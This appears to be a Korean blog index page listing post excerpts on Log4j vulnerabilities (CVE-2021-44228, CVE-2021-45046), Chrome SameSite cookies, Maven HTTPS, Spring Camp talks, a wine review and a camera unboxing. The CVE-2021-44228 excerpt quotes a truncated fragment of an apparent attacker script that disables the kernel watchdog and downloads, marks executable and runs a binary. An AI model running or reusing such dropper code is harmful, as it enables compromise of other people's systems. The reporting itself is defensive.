분류 전체보기

분류 전체보기

    Log4j 2.15.0 취약점 CVE-2021-45046

    Log4j 2.15.0 으로 업그레이드 한지 하루만에 CVE-2021-45046 가 공개되었습니다. 영향 받는 버전 Logj2

    Log4j 취약점 (CVE-2021-44228) 을 막는 5가지 방법

    스위스 정부에서 깔끔하게 정리해서 포스팅한 글을 참조 하였습니다. 이미 이슈는 다뤘으니 Log4j 2.x 의 이슈 CVE-2021-44228 설명은 생략 하겠습니다. 이슈 관련 포스팅은 CVE-2021-44228 취약점 참고하세요. Message formatting 을 통한 lookup 동작을 위해 ${protocol:~~~} 의 패턴을 갖습니다. WAF 에 룰을 설정하여 차단합니다. Log4j2 의 message lookup 을 disable 합니다. (2.10

    CVE-2021-44228 취약점

    2021년 12월 10일. CVE-2021-44228 취약점이 공개 되었습니다. 현재 수많은 사이트 등에서 다수의 스캔 흔적이 포착 된것으로 확인 됩니다. 자바 어플리케이션을 사용하는 곳은 모두 체크 해봐야 합니다. 영향 받는 버전 Log4j 2.x /proc/sys/kernel/nmi_watchdog echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf ROOTUID="0" function __curl() { read proto server path $HOME/curl; chmod +x $HOME/curl $HOME/curl -V && WGET="$HOME/curl -o" $HOME/curl -V || __curl "$CURL_DOWNLOAD_URL" > $BIN_PAT..

    Google Chrome 80 SameSite Policy

    배포 예정일 Chrome 80 부터 cookie samesite 정책이 변경된다. 2020. 02. 04 배포 예정 * 2020. 02. 05 AM 9 체크해보니 업데이트 되었다. 변경 사항 SameSite attributer가 지정되지 않았을 때 SameSite=Lax 가 기본값으로 변경 SameSite=None 설정시 secure flag가 활성화 되어 있지 않으면 reject 참고 사이트 https://www.chromestatus.com/feature/5088147346030592 https://www.chromestatus.com/feature/5633521622188032 SameSite Attribue의 설정 정보 ValueDescription Strict 이 설정을 사용하는 쿠키는 처음에 ..

    Maven Central Repository blocking http protocol

    2020. 01. 15 일 부로 http://repo1.maven.org / http://repo.maven.apache.org/ 두 repository에 대해 access가 제한된다. 2019년 4월 https 로 변경을 권고 하였고 이번에 변경이 완료 된것이다. https://central.sonatype.org/articles/2019/Apr/30/http-access-to-repo1mavenorg-and-repomavenapacheorg-is-being-deprecated/ https://blog.sonatype.com/central-repository-moving-to-https 하지만 미처 대처하지 못하고 잊고 있었는데 갑자기 제한되어 당황했다. maven central 뿐만 아니라 http:..

    Spring Camp 2019 발표자료

    KSUG Facebook 에 올라오고 있는 Spring Camp 2019 발표 자료 모음입니다. 트랙1 트랙2 실전에 써먹는 스프링 부트 GraalVM과 스프링, 이상과 현실 Monitoring With Actuator spring websocket Java, 돈내고 써야 하나요?!! 자바에서 null을 안전히 다루는 방법 정확하고, 우아하게! Reactive를 품은 Kafka 메시지 무엇을 테스트할 것인가? 어떻게 테스트할 것인가? Building GraphQL service with kotlin 당신도 할 수 있는 레거시 프로젝트 개선 이야기 Kotlin 프로젝트를 피할 수 없을 때 멀티리전 가용성을 위한 글로벌 캐싱 - Hidden micro services Kotlin + Spring Data J..

    Two Hands, Bella's Garden Shiraz 2015

    Two Hands, Bella's Garden Shiraz 투 핸즈, 벨라스 가든 시라즈 국가 Australia (호주) 지역 Barossa Valley (바로사 벨리) 생산자 Two Hands Wines (투핸즈 와인) 이름 Two Hands, Bella's Garden Shiraz 투핸즈, 벨라스 가든 시라즈 빈티지 2015년 등급 - 품종 Shiraz 100% (시라즈 100%) 도수 15.00% 종류 Red / Full Body 용도 Table Wine 당도 2 산도 2 가격 \80,000 할인내역 \3,000 실구매가 \77,000 (와인 공간) 구매일 2018. 04. 26 Tasting Notes (수입사) 깊은 루비-퍼플색을 띠며 집중도 있는 블랙베리와 플럼의 향. 다크 초콜릿향, 그을린 ..

    NX300 + 18-55mm

    드디어 NX300 도착!! 박스를 뜯으니 설치용 시디와 Adobe Lightroom 4 !!! 시리얼도 포함.. 모든 구성품.바디(+바디캡), 18-55 렌즈, 후드, 스트랩배터리, 메모리카드, USB, 어댑터, 플래시 메모리카드는 SD어댑터롤 이용한 MicroSD 8GB 가 들어있습니다 ㅠㅠ;; 하단을 열어 배터리와 메모리 카드를 장착합니다. 플래시는 기본 제공 되는건 외장형인데 이렇게 생겼습니다. 하단엔 핫슈단자가 보입니다. 상단에 핫슈캡을 제거 한뒤... 이렇게 달아주면 됩니다. 짜잔!! 이 상태에서는 플래시가 터지지 않습니다. 장착하신다음 다이얼을 돌려서 잠궈야 합니다. 이렇게 올려서 사용하시면 됩니다. 기본 번들킷이라 18-55 렌즈가 기본 제공 됩니다. 삼성이라고 새겨진 렌즈캡이 보이네요. A..